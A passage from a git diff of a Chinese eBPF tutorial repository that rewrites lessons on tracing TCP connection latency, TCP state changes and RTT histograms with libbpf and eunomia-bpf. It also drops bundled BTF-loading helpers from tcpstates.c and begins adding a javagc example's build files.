+        fprintf(stderr, "broken event: event->af=%d", e->af);
+        return;
+    }
+
+    if (env.lport) {
+        printf("%-6d %-12.12s %-2d %-16s %-6d %-16s %-5d %.2f\n", e->tgid,
+               e->comm, e->af == AF_INET ? 4 : 6,
+               inet_ntop(e->af, &s, src, sizeof(src)), e->lport,
+               inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport),
+               e->delta_us / 1000.0);
+    } else {
+        printf("%-6d %-12.12s %-2d %-16s %-16s %-5d %.2f\n", e->tgid, e->comm,
+               e->af == AF_INET ? 4 : 6, inet_ntop(e->af, &s, src, sizeof(src)),
+               inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport),
+               e->delta_us / 1000.0);
+    }
+}
+
+

handle_event函数的参数包括了CPU编号、指向数据的指针以及数据的大小。数据是一个event结构体,包含了之前在内核态计算得到的TCP连接的信息。

+

首先，它将接收到的事件的时间戳和起始时间戳（如果存在）进行对比，计算出事件的相对时间并打印出来。接着，根据 IP 地址的类型（IPv4 或 IPv6），把二进制形式的源地址和目标地址拷贝到对应的 in_addr/in6_addr 结构中，稍后由 inet_ntop 转换成人类可读的字符串。

+

最后,根据用户是否选择了显示本地端口,将进程ID、进程名称、IP版本、源IP地址、本地端口(如果有)、目标IP地址、目标端口以及连接建立时间打印出来。这个连接建立时间是我们在内核态eBPF程序中计算并发送到用户态的。

编译运行

$ make
 ...
@@ -277,9 +656,17 @@ PID    COMM         IP SADDR            DADDR            DPORT LAT(ms)
 222726 ssh          4  192.168.88.15    167.179.101.42   22    241.17
 222774 ssh          4  192.168.88.15    1.15.149.151     22    25.31
 
+

源代码:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat

+

参考资料:

+

总结

-

通过上面的实验,我们可以看到,tcpconnlat 工具的实现原理是基于内核的TCP连接的跟踪,并且可以跟踪到 tcp 连接的延迟时间;除了命令行使用方式之外,还可以将其和容器、k8s 等元信息综合起来,通过 prometheusgrafana 等工具进行网络性能分析。

-

来源:https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.bpf.c

+

通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 来跟踪和统计 TCP 连接建立的延时。我们首先深入探讨了 eBPF 程序如何在内核态监听特定的内核函数,然后通过捕获这些函数的调用,从而得到连接建立的起始时间和结束时间,计算出延时。

+

我们还进一步了解了如何使用 BPF maps 来在内核态存储和查询数据,从而在 eBPF 程序的多个部分之间共享数据。同时,我们也探讨了如何使用 perf events 来将数据从内核态发送到用户态,以便进一步处理和展示。

+

在用户态,我们介绍了如何使用 libbpf 库的 API,例如 perf_buffer__poll,来接收和处理内核态发送过来的数据。我们还讲解了如何对这些数据进行解析和打印,使得它们能以人类可读的形式显示出来。

+

如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf 。您还可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

+

接下来的教程将进一步探讨 eBPF 的高级特性,例如如何使用 eBPF 来追踪网络包的传输路径,如何利用 eBPF 对系统的性能进行细粒度的监控等等。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术,希望这些内容对您在 eBPF 开发道路上的学习和实践有所帮助。

diff --git a/13-tcpconnlat/tcpconnlat.c b/13-tcpconnlat/tcpconnlat.c index 8fa49a5..8c2ca9d 100644 --- a/13-tcpconnlat/tcpconnlat.c +++ b/13-tcpconnlat/tcpconnlat.c @@ -14,7 +14,6 @@ #include #include #include "tcpconnlat.skel.h" -// #include "trace_helpers.h" #define PERF_BUFFER_PAGES 16 #define PERF_POLL_TIMEOUT_MS 100 diff --git a/13-tcpconnlat/tcpconnlat.html b/13-tcpconnlat/tcpconnlat.html index e2962fd..87574ab 100644 --- a/13-tcpconnlat/tcpconnlat.html +++ b/13-tcpconnlat/tcpconnlat.html @@ -83,7 +83,7 @@ diff --git a/14-tcpstates/index.html b/14-tcpstates/index.html index 13d818c..4d0df5a 100644 --- a/14-tcpstates/index.html +++ b/14-tcpstates/index.html @@ -83,7 +83,7 @@ @@ -144,21 +144,27 @@
-

eBPF入门实践教程:使用 libbpf-bootstrap 开发程序统计 TCP 连接延时

-

内核态代码

-
// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
-/* Copyright (c) 2021 Hengqi Chen */
-#include <vmlinux.h>
-#include <bpf/bpf_helpers.h>
-#include <bpf/bpf_tracing.h>
-#include <bpf/bpf_core_read.h>
-#include "tcpstates.h"
+                        

eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT

+

eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。

+

在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍两个示例程序:tcpstatestcprtttcpstates 用于记录 TCP 连接的状态变化,而 tcprtt 则用于记录 TCP 的往返时间 (RTT, Round-Trip Time)。

+

tcprtttcpstates

+

网络质量在当前的互联网环境中至关重要。影响网络质量的因素有许多,包括硬件、网络环境、软件编程的质量等。为了帮助用户更好地定位网络问题,我们引入了 tcprtt 这个工具。tcprtt 可以监控 TCP 链接的往返时间,从而评估网络质量,帮助用户找出可能的问题所在。

+

当 TCP 链接建立时,tcprtt 会自动根据当前系统的状况,选择合适的执行函数。在执行函数中,tcprtt 会收集 TCP 链接的各项基本信息,如源地址、目标地址、源端口、目标端口、耗时等,并将这些信息更新到直方图型的 BPF map 中。运行结束后,tcprtt 会通过用户态代码,将收集的信息以图形化的方式展示给用户。

+

tcpstates 则是一个专门用来追踪和打印 TCP 连接状态变化的工具。它可以显示 TCP 连接在每个状态中的停留时长,单位为毫秒。例如,对于一个单独的 TCP 会话,tcpstates 可以打印出类似以下的输出:

+
SKADDR           C-PID C-COMM     LADDR           LPORT RADDR           RPORT OLDSTATE    -> NEWSTATE    MS
+ffff9fd7e8192000 22384 curl       100.66.100.185  0     52.33.159.26    80    CLOSE       -> SYN_SENT    0.000
+ffff9fd7e8192000 0     swapper/5  100.66.100.185  63446 52.33.159.26    80    SYN_SENT    -> ESTABLISHED 1.373
+ffff9fd7e8192000 22384 curl       100.66.100.185  63446 52.33.159.26    80    ESTABLISHED -> FIN_WAIT1   176.042
 
-#define MAX_ENTRIES 10240
-#define AF_INET     2
-#define AF_INET6    10
-
-const volatile bool filter_by_sport = false;
+ffff9fd7e8192000 0     swapper/5  100.66.100.185  63446 52.33.159.26    80    FIN_WAIT1   -> FIN_WAIT2   0.536
+ffff9fd7e8192000 0     swapper/5  100.66.100.185  63446 52.33.159.26    80    FIN_WAIT2   -> CLOSE       0.006
+
+

在以上输出中，耗时最长的是 ESTABLISHED 状态，即连接已建立并正在传输数据的状态：从进入该状态到转变为 FIN_WAIT1 状态（开始关闭连接）共经历了 176.042 毫秒。

+

在我们接下来的教程中,我们会更深入地探讨这两个工具,解释它们的实现原理,希望这些内容对你在使用 eBPF 进行网络和性能分析方面的工作有所帮助。

+

tcpstates

+

由于篇幅所限，这里我们主要讨论和分析对应的 eBPF 内核态代码实现。以下是 tcpstates 的 eBPF 代码：

+
const volatile bool filter_by_sport = false;
 const volatile bool filter_by_dport = false;
 const volatile short target_family = 0;
 
@@ -246,78 +252,16 @@ int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx)
 
     return 0;
 }
-
-char LICENSE[] SEC("license") = "Dual BSD/GPL";
 
-

tcpstates 是一个追踪当前系统上的TCP套接字的TCP状态的程序,主要通过跟踪内核跟踪点 inet_sock_set_state 来实现。统计数据通过 perf_event向用户态传输。

-
SEC("tracepoint/sock/inet_sock_set_state")
-int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx)
-
-

在套接字改变状态处附加一个eBPF跟踪函数。

-
 if (ctx->protocol != IPPROTO_TCP)
-  return 0;
-
- if (target_family && target_family != family)
-  return 0;
-
- if (filter_by_sport && !bpf_map_lookup_elem(&sports, &sport))
-  return 0;
-
- if (filter_by_dport && !bpf_map_lookup_elem(&dports, &dport))
-  return 0;
-
-

跟踪函数被调用后,先判断当前改变状态的套接字是否满足我们需要的过滤条件,如果不满足则不进行记录。

-
 tsp = bpf_map_lookup_elem(&timestamps, &sk);
- ts = bpf_ktime_get_ns();
- if (!tsp)
-  delta_us = 0;
- else
-  delta_us = (ts - *tsp) / 1000;
-
- event.skaddr = (__u64)sk;
- event.ts_us = ts / 1000;
- event.delta_us = delta_us;
- event.pid = bpf_get_current_pid_tgid() >> 32;
- event.oldstate = ctx->oldstate;
- event.newstate = ctx->newstate;
- event.family = family;
- event.sport = sport;
- event.dport = dport;
- bpf_get_current_comm(&event.task, sizeof(event.task));
-
- if (family == AF_INET) {
-  bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_rcv_saddr);
-  bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_daddr);
- } else { /* family == AF_INET6 */
-  bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
-  bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
- }
-
-

使用状态改变相关填充event结构体。

-
    -
  • 此处使用了libbpf 的 CO-RE 支持。
  • -
-
 bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event));
-
-

将事件结构体发送至用户态程序。

-
 if (ctx->newstate == TCP_CLOSE)
-  bpf_map_delete_elem(&timestamps, &sk);
- else
-  bpf_map_update_elem(&timestamps, &sk, &ts, BPF_ANY);
-
-

根据这个TCP链接的新状态,决定是更新下时间戳记录还是不再记录它的时间戳。

-

用户态程序

-
    while (!exiting) {
-        err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS);
-        if (err < 0 && err != -EINTR) {
-            warn("error polling perf buffer: %s\n", strerror(-err));
-            goto cleanup;
-        }
-        /* reset err to return 0 if exiting */
-        err = 0;
-    }
-
-

不停轮询内核程序所发过来的 perf event

+

tcpstates主要依赖于 eBPF 的 Tracepoints 来捕获 TCP 连接的状态变化,从而跟踪 TCP 连接在每个状态下的停留时间。

+

定义 BPF Maps

+

tcpstates程序中,首先定义了几个 BPF Maps,它们是 eBPF 程序和用户态程序之间交互的主要方式。sportsdports分别用于存储源端口和目标端口,用于过滤 TCP 连接;timestamps用于存储每个 TCP 连接的时间戳,以计算每个状态的停留时间;events则是一个 perf_event 类型的 map,用于将事件数据发送到用户态。

+

追踪 TCP 连接状态变化

+

程序定义了一个名为handle_set_state的函数,该函数是一个 tracepoint 类型的程序,它将被挂载到sock/inet_sock_set_state这个内核 tracepoint 上。每当 TCP 连接状态发生变化时,这个 tracepoint 就会被触发,然后执行handle_set_state函数。
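该挂载点的声明如下（节选自内核态代码）：

SEC("tracepoint/sock/inet_sock_set_state")
int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx)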

+

handle_set_state函数中,首先通过一系列条件判断确定是否需要处理当前的 TCP 连接,然后从timestampsmap 中获取当前连接的上一个时间戳,然后计算出停留在当前状态的时间。接着,程序将收集到的数据放入一个 event 结构体中,并通过bpf_perf_event_output函数将该 event 发送到用户态。

+

更新时间戳

+

最后,根据 TCP 连接的新状态,程序将进行不同的操作:如果新状态为 TCP_CLOSE,表示连接已关闭,程序将从timestampsmap 中删除该连接的时间戳;否则,程序将更新该连接的时间戳。
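对应的代码片段如下（节选自内核态代码）：

if (ctx->newstate == TCP_CLOSE)
    bpf_map_delete_elem(&timestamps, &sk);
else
    bpf_map_update_elem(&timestamps, &sk, &ts, BPF_ANY);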

+

用户态的部分主要是通过 libbpf 来加载 eBPF 程序,然后通过 perf_event 来接收内核中的事件数据:

static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) {
     char ts[32], saddr[26], daddr[26];
     struct event* e = data;
@@ -350,13 +294,100 @@ int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx)
             (double)e->delta_us / 1000);
     }
 }
+
+

handle_event就是这样一个回调函数,它会被 perf_event 调用,每当内核有新的事件到达时,它就会处理这些事件。

+

handle_event函数中,我们首先通过inet_ntop函数将二进制的 IP 地址转换成人类可读的格式,然后根据是否需要输出宽格式,分别打印不同的信息。这些信息包括了事件的时间戳、源 IP 地址、源端口、目标 IP 地址、目标端口、旧状态、新状态以及在旧状态停留的时间。

+

这样,用户就可以清晰地看到 TCP 连接状态的变化,以及每个状态的停留时间,从而帮助他们诊断网络问题。

+

总结起来,用户态部分的处理主要涉及到了以下几个步骤:

+
    +
  1. 使用 libbpf 加载并运行 eBPF 程序。
  2. +
  3. 设置回调函数来接收内核发送的事件。
  4. +
  5. 处理接收到的事件,将其转换成人类可读的格式并打印。
  6. +
+

以上就是tcpstates程序用户态部分的主要实现逻辑。通过这一章的学习,你应该已经对如何在用户态处理内核事件有了更深入的理解。在下一章中,我们将介绍更多关于如何使用 eBPF 进行网络监控的知识。

+

tcprtt

+

在本章节中,我们将分析tcprtt eBPF 程序的内核态代码。tcprtt是一个用于测量 TCP 往返时间(Round Trip Time, RTT)的程序,它将 RTT 的信息统计到一个 histogram 中。

+

+/// @sample {"interval": 1000, "type" : "log2_hist"}
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, MAX_ENTRIES);
+    __type(key, u64);
+    __type(value, struct hist);
+} hists SEC(".maps");
 
-static void handle_lost_events(void* ctx, int cpu, __u64 lost_cnt) {
-    warn("lost %llu events on CPU #%d\n", lost_cnt, cpu);
+static struct hist zero;
+
+SEC("fentry/tcp_rcv_established")
+int BPF_PROG(tcp_rcv, struct sock *sk)
+{
+    const struct inet_sock *inet = (struct inet_sock *)(sk);
+    struct tcp_sock *ts;
+    struct hist *histp;
+    u64 key, slot;
+    u32 srtt;
+
+    if (targ_sport && targ_sport != inet->inet_sport)
+        return 0;
+    if (targ_dport && targ_dport != sk->__sk_common.skc_dport)
+        return 0;
+    if (targ_saddr && targ_saddr != inet->inet_saddr)
+        return 0;
+    if (targ_daddr && targ_daddr != sk->__sk_common.skc_daddr)
+        return 0;
+
+    if (targ_laddr_hist)
+        key = inet->inet_saddr;
+    else if (targ_raddr_hist)
+        key = inet->sk.__sk_common.skc_daddr;
+    else
+        key = 0;
+    histp = bpf_map_lookup_or_try_init(&hists, &key, &zero);
+    if (!histp)
+        return 0;
+    ts = (struct tcp_sock *)(sk);
+    srtt = BPF_CORE_READ(ts, srtt_us) >> 3;
+    if (targ_ms)
+        srtt /= 1000U;
+    slot = log2l(srtt);
+    if (slot >= MAX_SLOTS)
+        slot = MAX_SLOTS - 1;
+    __sync_fetch_and_add(&histp->slots[slot], 1);
+    if (targ_show_ext) {
+        __sync_fetch_and_add(&histp->latency, srtt);
+        __sync_fetch_and_add(&histp->cnt, 1);
+    }
+    return 0;
 }
 
-

收到事件后所调用对应的处理函数并进行输出打印。

+

首先,我们定义了一个 hash 类型的 eBPF map,名为hists,它用来存储 RTT 的统计信息。在这个 map 中,键是 64 位整数,值是一个hist结构,这个结构包含了一个数组,用来存储不同 RTT 区间的数量。

+

接着，我们定义了一个 eBPF 程序，名为tcp_rcv，它挂载在内核的 tcp_rcv_established 函数上，会在内核处理处于 ESTABLISHED 状态的 TCP 连接收包时被调用。在这个程序中，我们首先根据过滤条件（源/目标 IP 地址和端口）对 TCP 连接进行过滤。如果满足条件，我们会根据设置的参数选择相应的 key（源 IP 或者目标 IP 或者 0），然后在hists map 中查找或者初始化对应的 histogram。

+

接下来,我们读取 TCP 连接的srtt_us字段,这个字段表示了平滑的 RTT 值,单位是微秒。然后我们将这个 RTT 值转换为对数形式,并将其作为 slot 存储到 histogram 中。

+

如果设置了show_ext参数,我们还会将 RTT 值和计数器累加到 histogram 的latencycnt字段中。

+

通过以上的处理,我们可以对每个 TCP 连接的 RTT 进行统计和分析,从而更好地理解网络的性能状况。

+

总结起来,tcprtt eBPF 程序的主要逻辑包括以下几个步骤:

+
    +
  1. 根据过滤条件对 TCP 连接进行过滤。
  2. +
  3. hists map 中查找或者初始化对应的 histogram。
  4. +
  5. 读取 TCP 连接的srtt_us字段,并将其转换为对数形式,存储到 histogram 中。
  6. +
  7. 如果设置了show_ext参数,将 RTT 值和计数器累加到 histogram 的latencycnt字段中。
  8. +
+

tcprtt 挂载到了内核态的 tcp_rcv_established 函数上:

+
void tcp_rcv_established(struct sock *sk, struct sk_buff *skb);
+
+

这个函数是在内核中处理TCP接收数据的主要函数,主要在TCP连接处于ESTABLISHED状态时被调用。这个函数的处理逻辑包括一个快速路径和一个慢速路径。快速路径在以下几种情况下会被禁用:

+
    +
  • 我们宣布了一个零窗口 - 零窗口探测只能在慢速路径中正确处理。
  • +
  • 收到了乱序的数据包。
  • +
  • 期待接收紧急数据。
  • +
  • 没有剩余的缓冲区空间。
  • +
  • 接收到了意外的TCP标志/窗口值/头部长度(通过检查TCP头部与预设标志进行检测)。
  • +
  • 数据在两个方向上都在传输。快速路径只支持纯发送者或纯接收者(这意味着序列号或确认值必须保持不变)。
  • +
  • 接收到了意外的TCP选项。
  • +
+

当不满足快速路径的条件（即出现上述任一情况）时，tcp_rcv_established 会退回到遵循 RFC793 的标准接收处理过程来处理所有情况。前三种情况可以通过正确设置预测标志（pred_flags）来保证，其余情况则需要内联检查。当一切正常时，快速处理会在 tcp_data_queue 函数中被开启。

编译运行

+

对于 tcpstates,可以通过以下命令编译和运行 libbpf 应用:

$ make
 ...
   BPF      .output/tcpstates.bpf.o
@@ -375,8 +406,92 @@ ffff9bf6d8ee88c0 229832  redis-serv 0.0.0.0         6379  0.0.0.0         0
 ffff9bf6d8ee88c0 229832  redis-serv 0.0.0.0         6379  0.0.0.0         0     LISTEN      -> CLOSE       1.763
 ffff9bf7109d6900 88750   node       127.0.0.1       39755 127.0.0.1       50966 ESTABLISHED -> FIN_WAIT1   0.000
 
+

对于 tcprtt,我们可以使用 eunomia-bpf 编译运行这个例子:

+

Compile:

+
docker run -it -v `pwd`/:/src/ yunwei37/ebpm:latest
+
+

或者

+
$ ecc tcprtt.bpf.c tcprtt.h
+Compiling bpf object...
+Generating export types...
+Packing ebpf object and config into package.json...
+
+

运行:

+
$ sudo ecli run package.json -h
+A simple eBPF program
+
+
+Usage: package.json [OPTIONS]
+
+Options:
+      --verbose                  Whether to show libbpf debug information
+      --targ_laddr_hist          Set value of `bool` variable targ_laddr_hist
+      --targ_raddr_hist          Set value of `bool` variable targ_raddr_hist
+      --targ_show_ext            Set value of `bool` variable targ_show_ext
+      --targ_sport <targ_sport>  Set value of `__u16` variable targ_sport
+      --targ_dport <targ_dport>  Set value of `__u16` variable targ_dport
+      --targ_saddr <targ_saddr>  Set value of `__u32` variable targ_saddr
+      --targ_daddr <targ_daddr>  Set value of `__u32` variable targ_daddr
+      --targ_ms                  Set value of `bool` variable targ_ms
+  -h, --help                     Print help
+  -V, --version                  Print version
+
+Built with eunomia-bpf framework.
+See https://github.com/eunomia-bpf/eunomia-bpf for more information.
+
+$ sudo ecli run package.json
+key =  0
+latency = 0
+cnt = 0
+
+     (unit)              : count    distribution
+         0 -> 1          : 0        |                                        |
+         2 -> 3          : 0        |                                        |
+         4 -> 7          : 0        |                                        |
+         8 -> 15         : 0        |                                        |
+        16 -> 31         : 0        |                                        |
+        32 -> 63         : 0        |                                        |
+        64 -> 127        : 0        |                                        |
+       128 -> 255        : 0        |                                        |
+       256 -> 511        : 0        |                                        |
+       512 -> 1023       : 4        |********************                    |
+      1024 -> 2047       : 1        |*****                                   |
+      2048 -> 4095       : 0        |                                        |
+      4096 -> 8191       : 8        |****************************************|
+
+key =  0
+latency = 0
+cnt = 0
+
+     (unit)              : count    distribution
+         0 -> 1          : 0        |                                        |
+         2 -> 3          : 0        |                                        |
+         4 -> 7          : 0        |                                        |
+         8 -> 15         : 0        |                                        |
+        16 -> 31         : 0        |                                        |
+        32 -> 63         : 0        |                                        |
+        64 -> 127        : 0        |                                        |
+       128 -> 255        : 0        |                                        |
+       256 -> 511        : 0        |                                        |
+       512 -> 1023       : 11       |***************************             |
+      1024 -> 2047       : 1        |**                                      |
+      2048 -> 4095       : 0        |                                        |
+      4096 -> 8191       : 16       |****************************************|
+      8192 -> 16383      : 4        |**********                              |
+
+

完整源代码:

+ +

参考资料:

+

总结

-

这里的代码修改自 https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpstates.bpf.c

+

通过本篇 eBPF 入门实践教程,我们学习了如何使用tcpstates和tcprtt这两个 eBPF 示例程序,监控和分析 TCP 的连接状态和往返时间。我们了解了tcpstates和tcprtt的工作原理和实现方式,包括如何使用 BPF map 存储数据,如何在 eBPF 程序中获取和处理 TCP 连接信息,以及如何在用户态应用程序中解析和显示 eBPF 程序收集的数据。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。

diff --git a/14-tcpstates/tcpstates.c b/14-tcpstates/tcpstates.c index ecdeb67..6f9d8c5 100644 --- a/14-tcpstates/tcpstates.c +++ b/14-tcpstates/tcpstates.c @@ -183,257 +183,6 @@ static void handle_lost_events(void* ctx, int cpu, __u64 lost_cnt) { warn("lost %llu events on CPU #%d\n", lost_cnt, cpu); } -extern unsigned char _binary_min_core_btfs_tar_gz_start[] __attribute__((weak)); -extern unsigned char _binary_min_core_btfs_tar_gz_end[] __attribute__((weak)); - - -/* tar header from - * https://github.com/tklauser/libtar/blob/v1.2.20/lib/libtar.h#L39-L60 */ -struct tar_header { - char name[100]; - char mode[8]; - char uid[8]; - char gid[8]; - char size[12]; - char mtime[12]; - char chksum[8]; - char typeflag; - char linkname[100]; - char magic[6]; - char version[2]; - char uname[32]; - char gname[32]; - char devmajor[8]; - char devminor[8]; - char prefix[155]; - char padding[12]; -}; - -static char* tar_file_start(struct tar_header* tar, - const char* name, - int* length) { - while (tar->name[0]) { - sscanf(tar->size, "%o", length); - if (!strcmp(tar->name, name)) - return (char*)(tar + 1); - tar += 1 + (*length + 511) / 512; - } - return NULL; -} -#define FIELD_LEN 65 -#define ID_FMT "ID=%64s" -#define VERSION_FMT "VERSION_ID=\"%64s" - -struct os_info { - char id[FIELD_LEN]; - char version[FIELD_LEN]; - char arch[FIELD_LEN]; - char kernel_release[FIELD_LEN]; -}; - -static struct os_info* get_os_info() { - struct os_info* info = NULL; - struct utsname u; - size_t len = 0; - ssize_t read; - char* line = NULL; - FILE* f; - - if (uname(&u) == -1) - return NULL; - - f = fopen("/etc/os-release", "r"); - if (!f) - return NULL; - - info = calloc(1, sizeof(*info)); - if (!info) - goto out; - - strncpy(info->kernel_release, u.release, FIELD_LEN); - strncpy(info->arch, u.machine, FIELD_LEN); - - while ((read = getline(&line, &len, f)) != -1) { - if (sscanf(line, ID_FMT, info->id) == 1) - continue; - - if (sscanf(line, VERSION_FMT, info->version) == 1) { - /* remove '"' suffix */ - info->version[strlen(info->version) - 1] = 0; - continue; - } - } - -out: - free(line); - fclose(f); - - return info; -} -#define INITIAL_BUF_SIZE (1024 * 1024 * 4) /* 4MB */ - -/* adapted from https://zlib.net/zlib_how.html */ -static int inflate_gz(unsigned char* src, - int src_size, - unsigned char** dst, - int* dst_size) { - size_t size = INITIAL_BUF_SIZE; - size_t next_size = size; - z_stream strm; - void* tmp; - int ret; - - strm.zalloc = Z_NULL; - strm.zfree = Z_NULL; - strm.opaque = Z_NULL; - strm.avail_in = 0; - strm.next_in = Z_NULL; - - ret = inflateInit2(&strm, 16 + MAX_WBITS); - if (ret != Z_OK) - return -EINVAL; - - *dst = malloc(size); - if (!*dst) - return -ENOMEM; - - strm.next_in = src; - strm.avail_in = src_size; - - /* run inflate() on input until it returns Z_STREAM_END */ - do { - strm.next_out = *dst + strm.total_out; - strm.avail_out = next_size; - ret = inflate(&strm, Z_NO_FLUSH); - if (ret != Z_OK && ret != Z_STREAM_END) - goto out_err; - /* we need more space */ - if (strm.avail_out == 0) { - next_size = size; - size *= 2; - tmp = realloc(*dst, size); - if (!tmp) { - ret = -ENOMEM; - goto out_err; - } - *dst = tmp; - } - } while (ret != Z_STREAM_END); - - *dst_size = strm.total_out; - - /* clean up and return */ - ret = inflateEnd(&strm); - if (ret != Z_OK) { - ret = -EINVAL; - goto out_err; - } - return 0; - -out_err: - free(*dst); - *dst = NULL; - return ret; -} -struct btf *btf__load_vmlinux_btf(void); -void btf__free(struct btf *btf); -static bool vmlinux_btf_exists(void) { - struct btf* 
btf; - int err; - - btf = btf__load_vmlinux_btf(); - err = libbpf_get_error(btf); - if (err) - return false; - - btf__free(btf); - return true; -} - -static int ensure_core_btf(struct bpf_object_open_opts* opts) { - char name_fmt[] = "./%s/%s/%s/%s.btf"; - char btf_path[] = "/tmp/bcc-libbpf-tools.btf.XXXXXX"; - struct os_info* info = NULL; - unsigned char* dst_buf = NULL; - char* file_start; - int dst_size = 0; - char name[100]; - FILE* dst = NULL; - int ret; - - /* do nothing if the system provides BTF */ - if (vmlinux_btf_exists()) - return 0; - - /* compiled without min core btfs */ - if (!_binary_min_core_btfs_tar_gz_start) - return -EOPNOTSUPP; - - info = get_os_info(); - if (!info) - return -errno; - - ret = mkstemp(btf_path); - if (ret < 0) { - ret = -errno; - goto out; - } - - dst = fdopen(ret, "wb"); - if (!dst) { - ret = -errno; - goto out; - } - - ret = snprintf(name, sizeof(name), name_fmt, info->id, info->version, - info->arch, info->kernel_release); - if (ret < 0 || ret == sizeof(name)) { - ret = -EINVAL; - goto out; - } - - ret = inflate_gz( - _binary_min_core_btfs_tar_gz_start, - _binary_min_core_btfs_tar_gz_end - _binary_min_core_btfs_tar_gz_start, - &dst_buf, &dst_size); - if (ret < 0) - goto out; - - ret = 0; - file_start = tar_file_start((struct tar_header*)dst_buf, name, &dst_size); - if (!file_start) { - ret = -EINVAL; - goto out; - } - - if (fwrite(file_start, 1, dst_size, dst) != dst_size) { - ret = -ferror(dst); - goto out; - } - - opts->btf_custom_path = strdup(btf_path); - if (!opts->btf_custom_path) - ret = -ENOMEM; - -out: - free(info); - fclose(dst); - free(dst_buf); - - return ret; -} - -static void cleanup_core_btf(struct bpf_object_open_opts* opts) { - if (!opts) - return; - - if (!opts->btf_custom_path) - return; - - unlink(opts->btf_custom_path); - free((void*)opts->btf_custom_path); -} - int main(int argc, char** argv) { LIBBPF_OPTS(bpf_object_open_opts, open_opts); static const struct argp argp = { @@ -454,12 +203,6 @@ int main(int argc, char** argv) { libbpf_set_strict_mode(LIBBPF_STRICT_ALL); libbpf_set_print(libbpf_print_fn); - err = ensure_core_btf(&open_opts); - if (err) { - warn("failed to fetch necessary BTF for CO-RE: %s\n", strerror(-err)); - return 1; - } - obj = tcpstates_bpf__open_opts(&open_opts); if (!obj) { warn("failed to open BPF object\n"); @@ -540,7 +283,6 @@ int main(int argc, char** argv) { cleanup: perf_buffer__free(pb); tcpstates_bpf__destroy(obj); - cleanup_core_btf(&open_opts); return err != 0; } diff --git a/15-javagc/.gitignore b/15-javagc/.gitignore new file mode 100644 index 0000000..f3a652f --- /dev/null +++ b/15-javagc/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +javagc +*.class diff --git a/15-javagc/Makefile b/15-javagc/Makefile new file mode 100644 index 0000000..1407744 --- /dev/null +++ b/15-javagc/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 
's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = javagc # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed 